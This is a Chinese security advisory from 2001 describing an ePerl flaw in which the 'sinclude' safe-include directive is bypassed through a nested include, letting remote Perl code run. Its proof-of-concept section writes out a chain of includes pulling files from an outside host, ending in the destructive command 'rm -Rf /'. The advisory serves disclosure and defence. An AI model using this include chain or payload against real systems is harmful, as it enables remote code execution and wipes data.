首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第23期->最新漏洞
期刊号: 类型: 关键词:
ePerl 外部代码执行漏洞

日期:2001-07-17

受影响的系统:  
Ralf S. Engelschall ePerl < 2.2.14
Ralf S. Engelschall ePerl 2.1.2
Ralf S. Engelschall ePerl 2.1.1
Ralf S. Engelschall ePerl 2.1
Ralf S. Engelschall ePerl 2.0.3
Ralf S. Engelschall ePerl 2.0.2
Ralf S. Engelschall ePerl 2.0.1
Ralf S. Engelschall ePerl 2.0
描述:
--------------------------------------------------------------------------------


BUGTRAQ ID : 2912

ePerl是一个Unix系统下的Perl过滤和解释程序。

ePerl允许使用"sinclude"指令"安全"地包含外部文件,此外部文件中的perl代码将会被
忽略,然而这种安全限制很容易被绕过。
如果外部文件中再次使用"sinclude"指令包含了另一个外部文件,那么另一个外部文件中
的perl代码将被解释执行。

<*来源:David Madison (madison@transmeta.com) *>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



David Madison (madison@transmeta.com)提供了如下测试方法:

1. 在目标主机上创建如下文件my_machine.html:
它包含下列指令:
-------------------------
#sinclude http://lala.com/untrusted.html
-------------------------
现在untrusted.html中即使包含perl代码,也不会被执行。

2. 在lala.com上创建untrusted.html文件:
它包含下列指令:
-------------------------
#include http://lala.com/untrusted2.html
-------------------------
3. 在lala.com上创建untrusted2.html文件:
这个文件中就可以防止perl代码,它将会被eperl解释执行:
-------------------------
<: system("rm -Rf /"); :>
-------------------------



--------------------------------------------------------------------------------
建议:

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.engelschall.com/sw/eperl

版权所有,未经许可,不得转载